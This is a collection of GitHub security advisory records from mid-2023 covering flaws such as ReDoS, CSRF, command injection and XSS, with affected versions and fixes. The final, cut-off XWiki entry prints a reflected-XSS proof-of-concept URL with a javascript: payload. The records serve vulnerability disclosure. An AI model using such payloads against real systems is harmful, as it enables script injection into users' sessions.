1.4.0 | GHSA-hww2-5g85-429m | 2023-07-14T21:52:02Z | 2023-06-29T15:30:34Z | null | ['CVE-2023-36617'] | URI gem has ReDoS vulnerability | A ReDoS issue was discovered in the URI component before 0.12.2 for Ruby. The URI parser mishandles invalid URLs that have specific characters. There is an increase in execution time for parsing strings to URI objects with `rfc2396_parser.rb` and `rfc3986_parser.rb`.
NOTE: this issue exists becuse of an incomplete fix for CVE-2023-28755. Version 0.10.3 is also a fixed version.
[The Ruby advisory recommends](https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617/) updating the uri gem to 0.12.2. In order to ensure compatibility with the bundled version in older Ruby series, you may update as follows instead:
- For Ruby 3.0: Update to uri 0.10.3
- For Ruby 3.1 and 3.2: Update to uri 0.12.2.
You can use gem update uri to update it. If you are using bundler, please add gem `uri`, `>= 0.12.2` (or other version mentioned above) to your Gemfile. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}] | [{'package': {'ecosystem': 'RubyGems', 'name': 'uri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'uri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.12.2'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36617'}, {'type': 'WEB', 'url': 'https://github.com/ruby/uri/commit/3cd938df20db26c9439e9f681aadfb9bbeb6d1c0'}, {'type': 'WEB', 'url': 'https://github.com/ruby/uri/commit/4d02315181d8a485496f1bb107a6ab51d6f3a35f'}, {'type': 'WEB', 'url': 'https://github.com/ruby/uri/commit/7e33934c91b7f8f3ea7b7a4258b468e19f636bc3'}, {'type': 'WEB', 'url': 'https://github.com/ruby/uri/commit/ba36c8a3ecad8c16dd3e60a6da9abd768206c8fa'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/uri'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2023-36617.yml'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230725-0002/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617/'}] | {'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:52:02Z', 'nvd_published_at': None} |
1.4.0 | GHSA-wprv-93r4-jj2p | 2023-06-19T19:46:37Z | 2023-06-19T19:46:37Z | null | ['CVE-2023-34459'] | OpenZeppelin Contracts using MerkleProof multiproofs may allow proving arbitrary leaves for specific trees | ### Impact
When the `verifyMultiProof`, `verifyMultiProofCalldata`, `processMultiProof`, or `processMultiProofCalldata` functions are in use, it is possible to construct merkle trees that allow forging a valid multiproof for an arbitrary set of leaves.
A contract may be vulnerable if it uses multiproofs for verification and the merkle tree that is processed includes a node with value 0 at depth 1 (just under the root). This could happen inadvertently for balanced trees with 3 leaves or less, if the leaves are not hashed. This could happen deliberately if a malicious tree builder includes such a node in the tree.
A contract is not vulnerable if it uses single-leaf proving (`verify`, `verifyCalldata`, `processProof`, or `processProofCalldata`), or if it uses multiproofs with a known tree that has hashed leaves. Standard merkle trees produced or validated with the [@openzeppelin/merkle-tree](https://github.com/OpenZeppelin/merkle-tree) library are safe.
### Patches
The problem has been patched in 4.9.2.
### Workarounds
If you are using multiproofs: When constructing merkle trees hash the leaves and do not insert empty nodes in your trees. Using the [@openzeppelin/merkle-tree](https://www.npmjs.com/package/@openzeppelin/merkle-tree) package eliminates this issue. Do not accept user-provided merkle roots without reconstructing at least the first level of the tree. Verify the merkle tree structure by reconstructing it from the leaves. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.0'}, {'fixed': '4.9.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.0'}, {'fixed': '4.9.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-wprv-93r4-jj2p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34459'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/commit/4d2383e17186be3e8ccf5a442e9686ecc7de1c55'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/releases/tag/v4.9.2'}] | {'cwe_ids': ['CWE-354'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T19:46:37Z', 'nvd_published_at': None} |
1.4.0 | GHSA-hh54-53m7-7ffj | 2023-06-13T23:57:23Z | 2023-06-07T15:30:17Z | null | ['CVE-2023-33498'] | alist Incorrect Access Control vulnerability | alist <=3.16.3 is vulnerable to Incorrect Access Control. Low privilege accounts can upload any file. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/alist-org/alist/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.16.3'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33498'}, {'type': 'WEB', 'url': 'https://github.com/YUyuanAN-com/loophole'}, {'type': 'PACKAGE', 'url': 'https://github.com/alist-org/alist'}] | {'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-08T18:05:49Z', 'nvd_published_at': None} |
1.4.0 | GHSA-223g-8w3x-98wr | 2023-06-09T22:40:23Z | 2023-06-09T22:40:23Z | null | ['CVE-2023-34230'] | Snowflake Connector .Net Command Injection | ### Issue
Snowflake was informed via our bug bounty program of a command injection vulnerability in the Snowflake .NET driver via SSO URL authentication.
### Impacted driver package:
snowflake-connector-net
### Impacted version range:
before [Version 2.0.18](https://community.snowflake.com/s/article/Dot-NET-Driver-Release-Notes)
### Attack Scenario
In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution.
This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources.
### Solution
On December 2nd, 2022, Snowflake merged a patch that fixed a command injection vulnerability in the Snowflake .NET driver via SSO URL authentication. The vulnerability affected the Snowflake .NET driver before Version 2.0.18. We strongly recommend upgrading to the latest driver version as soon as possible via the following resources: [Snowflake .NET Driver](https://docs.snowflake.com/en/developer-guide/dotnet/dotnet-driver).
### Additional Information
If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team). | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'NuGet', 'name': 'Snowflake.Data'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.18'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-net/security/advisories/GHSA-223g-8w3x-98wr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34230'}, {'type': 'PACKAGE', 'url': 'https://github.com/snowflakedb/snowflake-connector-net'}] | {'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:40:23Z', 'nvd_published_at': None} |
1.4.0 | GHSA-3qh5-qqj2-c78f | 2023-06-30T20:31:37Z | 2023-06-30T20:31:37Z | null | ['CVE-2023-2422'] | Keycloak vulnerable to Improper Client Certificate Validation for OAuth/OpenID clients | When a Keycloak server is configured to support mTLS authentication for OAuth/OpenID clients, it does not properly verify the client certificate chain. A client that possesses a proper certificate can authorize itself as any other client and therefore access data that belongs to other clients. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.1.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-3qh5-qqj2-c78f'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/5c6c55945a384bfd82e51283096204dcb6f63d91'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}] | {'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:31:37Z', 'nvd_published_at': None} |
1.4.0 | GHSA-7w2c-w47h-789w | 2023-07-11T20:19:37Z | 2023-06-12T19:50:34Z | null | ['CVE-2023-34246'] | Doorkeeper Improper Authentication vulnerability | OAuth RFC 8252 says https://www.rfc-editor.org/rfc/rfc8252#section-8.6
> the authorization server SHOULD NOT process authorization requests automatically without user consent or interaction, except when the identity of the client can be assured. **This includes the case where the user has previously approved an authorization request for a given client id**
But Doorkeeper automatically processes authorization requests without user consent for public clients that have been previously approved. Public clients are inherently vulnerable to impersonation, their identity cannot be assured.
Issue https://github.com/doorkeeper-gem/doorkeeper/issues/1589
Fix https://github.com/doorkeeper-gem/doorkeeper/pull/1646 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'RubyGems', 'name': 'doorkeeper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.6'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/security/advisories/GHSA-7w2c-w47h-789w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34246'}, {'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/issues/1589'}, {'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/pull/1646'}, {'type': 'PACKAGE', 'url': 'https://github.com/doorkeeper-gem/doorkeeper'}, {'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/releases/tag/v5.6.6'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/doorkeeper/CVE-2023-34246.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00016.html'}, {'type': 'WEB', 'url': 'https://www.rfc-editor.org/rfc/rfc8252#section-8.6'}] | {'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T19:50:34Z', 'nvd_published_at': None} |
1.4.0 | GHSA-mjff-wv85-hmcj | 2023-06-27T20:28:27Z | 2023-06-19T09:30:17Z | null | ['CVE-2023-35005'] | Apache Airflow vulnerable to exposure of sensitive information | In Apache Airflow, some potentially sensitive values were being shown to the user in certain situations.
This vulnerability is mitigated by the fact configuration is not shown in the UI by default (only if `[webserver] expose_config` is set to `non-sensitive-only`), and not all uncensored values are actually sentitive.
This issue affects Apache Airflow: from 2.5.0 before 2.6.2. Users are recommended to update to version 2.6.2 or later.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.6.2'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35005'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/31788'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/31820'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-89.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/o4f2cxh0054m9tlxpb81c1yhylor5gjd'}] | {'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T22:47:45Z', 'nvd_published_at': None} |
1.4.0 | GHSA-87mf-9wg6-ppf8 | 2023-06-16T17:45:05Z | 2023-06-12T18:52:23Z | null | [] | Ouroboros is Unsound | In 0.15.0 and prior, Ouroboros works internally by creating a struct where all uses of 'this are replaced by 'static. However, a recent addition to Miri checks that references passed to functions are valid during the entire execution of the function, even when those references are passed inside a struct. This poses an issue for dropping self-referencing values, as the reference becomes invalid during the dropping process. Effectively, since self-referencing structs are not allowed in vanilla Rust, there is no allowance for dropping data during a function that has also been given a reference to that data. There's usually no way to pass a and &a to the same function.
A fix was attempted, where the struct would be turned in to a raw byte array and only transformed back into the underlying data type inside each function. This is allowable as a reference can be created and die over the body of a function, as long as the reference was created inside the function. However, this is also not sound if the original struct contains padding. There is no way to initialize padding bytes to a known value that Miri will accept, so when it is cast to an array some of the bytes contain uninitialized values. This is not acceptable (despite the fact that these bytes are never read) due to the potential for optimizations that may read from the uninitialized bytes. Besides which, this fix does not allow for template or constant parameters as there is no way to check the size of a templated type without giving specific, concrete values for the template parameters.
The final solution was to use this fix while wrapping the raw byte array in MaybeUninit<>. | [] | [{'package': {'ecosystem': 'crates.io', 'name': 'ouroboros'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.16.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/joshua-maros/ouroboros/issues/88'}, {'type': 'PACKAGE', 'url': 'https://github.com/joshua-maros/ouroboros'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0042.html'}] | {'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:52:23Z', 'nvd_published_at': None} |
1.4.0 | GHSA-7c94-gvvj-r3mg | 2023-06-05T20:36:58Z | 2023-06-05T20:36:58Z | null | [] | cheqd-node affected by Inter-blockchain Communication (IBC) protocol "Huckleberry" vulnerability | ### Impact
This vulnerability affects the [`ibc-go` package for those running full nodes, dubbed "Huckleberry"](https://forum.cosmos.network/t/ibc-security-advisory-huckleberry/10731). According to their advisory:
> This issue is low-severity in general, and it has a low impact and likelihood of exploitation. Depending on how a full node is architected, this issue could potentially yield a high or critical severity vulnerability.
There is no vulnerability in the DID/resource modules for cheqd-node.
### Patches
Node operators are requested to upgrade to [cheqd-node v1.4.2](https://github.com/cheqd/cheqd-node/releases/tag/v1.4.2). This is a non-state breaking release, and does not require a coordinated upgrade across all node operators.
### Workarounds
No. Node operators are recommended to upgrade to the latest release version.
### References
- ["Huckleberry" IBC security advisory](https://forum.cosmos.network/t/ibc-security-advisory-huckleberry/10731)
- [`ibc-go` v6.1.1 release notes](https://github.com/cosmos/ibc-go/releases/tag/v6.1.1)
| [] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/cheqd/cheqd-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/cheqd/cheqd-node/security/advisories/GHSA-7c94-gvvj-r3mg'}, {'type': 'WEB', 'url': 'https://github.com/cheqd/cheqd-node/commit/f325f5f250e150e3e76a5a557669f67b606e34e1'}, {'type': 'WEB', 'url': 'https://forum.cosmos.network/t/ibc-security-advisory-huckleberry/10731'}, {'type': 'PACKAGE', 'url': 'https://github.com/cheqd/cheqd-node'}, {'type': 'WEB', 'url': 'https://github.com/cheqd/cheqd-node/releases/tag/v1.4.2'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/ibc-go/releases/tag/v6.1.1'}] | {'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-05T20:36:58Z', 'nvd_published_at': None} |
1.4.0 | GHSA-rwcp-qrwg-56cg | 2023-06-30T19:58:47Z | 2023-06-22T15:30:23Z | null | ['CVE-2023-34927'] | Casdoor Cross-Site Request Forgery vulnerability | Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint `/api/set-password`. This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/casdoor/casdoor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.331.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34927'}, {'type': 'WEB', 'url': 'https://github.com/casdoor/casdoor/issues/1531'}, {'type': 'WEB', 'url': 'https://casdoor.org/'}, {'type': 'WEB', 'url': 'https://gist.github.com/omriman067/4e90a3a4ffa40984f011d8777a995469'}, {'type': 'PACKAGE', 'url': 'https://github.com/casdoor/casdoor'}] | {'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:21Z', 'nvd_published_at': None} |
1.4.0 | GHSA-rqjq-ww83-wv5c | 2023-06-06T02:04:22Z | 2023-06-03T00:30:16Z | null | ['CVE-2023-2816'] | Hashicorp Consul allows user with service:write permissions to patch remote proxy instances | Consul and Consul Enterprise allowed any user with service:write permissions to use Envoy extensions configured via service-defaults to patch remote proxy instances that target the configured service, regardless of whether the user has permission to modify the service(s) corresponding to those modified proxies. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.15.3'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2816'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-16-consul-envoy-extension-downstream-proxy-configuration-by-upstream-service-owner/54525'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul'}] | {'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:04:22Z', 'nvd_published_at': None} |
1.4.0 | GHSA-jrjw-qgr2-wfcg | 2023-06-23T21:37:26Z | 2023-06-23T21:37:26Z | null | ['CVE-2023-33141'] | YARP Denial of Service Vulnerability | ### Impact
A denial of service vulnerability exists in YARP.
### Patches
If you're using YARP 1.x, you should update to NuGet package version [1.1.2](https://www.nuget.org/packages/Yarp.ReverseProxy/1.1.2).
If you're using YARP 2.0.0, you should update to NuGet package version [2.0.1](https://www.nuget.org/packages/Yarp.ReverseProxy/2.0.1).
You can do so by updating the `PackageReference` in your `.csproj` file
```diff
<ItemGroup>
- <PackageReference Include="Yarp.ReverseProxy" Version="2.0.0" />
- <PackageReference Include="Yarp.Telemetry.Consumption" Version="2.0.0" />
+ <PackageReference Include="Yarp.ReverseProxy" Version="2.0.1" />
+ <PackageReference Include="Yarp.Telemetry.Consumption" Version="2.0.1" />
</ItemGroup>
```
or by selecting `2.0.1` in the NuGet UI inside Visual Studio (`Manage NuGet Packages` / `Updates`)
### References
[CVE-2023-33141](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33141)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'NuGet', 'name': 'Yarp.ReverseProxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.1'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Yarp.ReverseProxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.1'}]}], 'versions': ['2.0.0']}] | [{'type': 'WEB', 'url': 'https://github.com/microsoft/reverse-proxy/security/advisories/GHSA-jrjw-qgr2-wfcg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33141'}, {'type': 'PACKAGE', 'url': 'https://github.com/microsoft/reverse-proxy'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33141'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/Yarp.ReverseProxy/1.1.2'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/Yarp.ReverseProxy/2.0.1'}] | {'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:37:26Z', 'nvd_published_at': None} |
1.4.0 | GHSA-vmxg-wx6c-4f3r | 2023-06-28T16:28:27Z | 2023-06-23T15:30:43Z | null | ['CVE-2023-3303'] | Admidio Improper Access Control vulnerability | Admidio prior to 4.2.9 is vulnerable to Improper Access Control. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.9'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3303'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/3d8bafaa4e9b7a314ffdf548622a8c7b38faee8a'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/65d260cc-55a9-4e71-888d-cb2f66c071af'}] | {'cwe_ids': ['CWE-284'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T17:00:55Z', 'nvd_published_at': None} |
1.4.0 | GHSA-m3v5-gjj9-rg24 | 2023-06-27T21:58:21Z | 2023-06-20T15:31:08Z | null | ['CVE-2023-33495'] | Craft CMS vulnerable to HTML injection | Craft CMS through 4.4.9 is vulnerable to HTML Injection. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.4.9'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33495'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://medium.com/@mondalsomnath9135/html-injection-in-craft-cms-application-e2b28f746212'}, {'type': 'WEB', 'url': 'https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T18:36:27Z', 'nvd_published_at': None} |
1.4.0 | GHSA-q36x-r5x4-h4q6 | 2023-06-09T19:32:49Z | 2023-06-09T19:32:49Z | null | ['CVE-2022-0618'] | Denial of service via HTTP/2 HEADERS frames padding | A program using swift-nio-http2 is vulnerable to a denial of service attack, caused by a network peer sending a specially crafted HTTP/2 frame. This attack affects all swift-nio-http2 versions from 1.0.0 to 1.19.2. It is fixed in 1.20.0 and later releases.
This vulnerability is caused by a logical error when parsing a HTTP/2 HEADERS or HTTP/2 PUSH_PROMISE frame where the frame contains padding information without any other data. This logical error caused confusion about the size of the frame, leading to a parsing error. This parsing error immediately crashes the entire process.
Sending a HEADERS frame or PUSH_PROMISE frame with HTTP/2 padding information does not require any special permission, so any HTTP/2 connection peer may send such a frame. For clients, this means any server to which they connect may launch this attack. For servers, anyone they allow to connect to them may launch such an attack.
The attack is low-effort: it takes very little resources to send an appropriately crafted frame. The impact on availability is high: receiving the frame immediately crashes the server, dropping all in-flight connections and causing the service to need to restart. It is straightforward for an attacker to repeatedly send appropriately crafted frames, so attackers require very few resources to achieve a substantial denial of service.
The attack does not have any confidentiality or integrity risks in and of itself: swift-nio-http2 is parsing the frame in memory-safe code, so the crash is safe. However, sudden process crashes can lead to violations of invariants in services, so it is possible that this attack can be used to trigger an error condition that has confidentiality or integrity risks.
The risk can be mitigated if untrusted peers can be prevented from communicating with the service. This mitigation is not available to many services.
The issue is fixed by rewriting the parsing code to correctly handle the condition. The issue was found by automated fuzzing by oss-fuzz. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/apple/swift-nio-http2.git'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.20'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/security/advisories/GHSA-q36x-r5x4-h4q6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-0618'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/commit/ac2a5afce3dbb6795b4f78ec3f19726dc28f5617'}, {'type': 'PACKAGE', 'url': 'https://github.com/apple/swift-nio-http2'}] | {'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:32:49Z', 'nvd_published_at': '2022-03-10T17:44:00Z'} |
1.4.0 | GHSA-7g45-4rm6-3mm3 | 2023-06-14T21:01:07Z | 2023-06-14T18:30:38Z | null | ['CVE-2023-2976'] | Guava vulnerable to insecure use of temporary directory | Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.
Even though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'com.google.guava:guava'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '32.0.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2976'}, {'type': 'WEB', 'url': 'https://github.com/google/guava/issues/2575'}, {'type': 'WEB', 'url': 'https://github.com/google/guava/issues/6532'}, {'type': 'WEB', 'url': 'https://github.com/google/guava/commit/feb83a1c8fd2e7670b244d5afd23cba5aca43284'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/guava'}, {'type': 'WEB', 'url': 'https://github.com/google/guava/releases/tag/v32.0.0'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0008/'}] | {'cwe_ids': ['CWE-379', 'CWE-552'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:01:07Z', 'nvd_published_at': None} |
1.4.0 | GHSA-75m3-f4hr-2vh9 | 2023-06-27T19:48:59Z | 2023-06-14T15:30:39Z | null | ['CVE-2023-35110'] | jjson vulnerable to stack exhaustion | An issue was discovered jjson through 0.1.7 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'de.grobmeier.json:jjson'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.7'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35110'}, {'type': 'WEB', 'url': 'https://github.com/grobmeier/jjson/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/grobmeier/jjson'}] | {'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:11:23Z', 'nvd_published_at': None} |
1.4.0 | GHSA-834c-x29c-f42c | 2023-06-30T20:24:46Z | 2023-06-22T19:59:10Z | null | ['CVE-2023-35156'] | XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in delete template | ### Impact
Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS).
It's possible to exploit the delete template to perform a XSS, e.g. by using URL such as:
> xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)
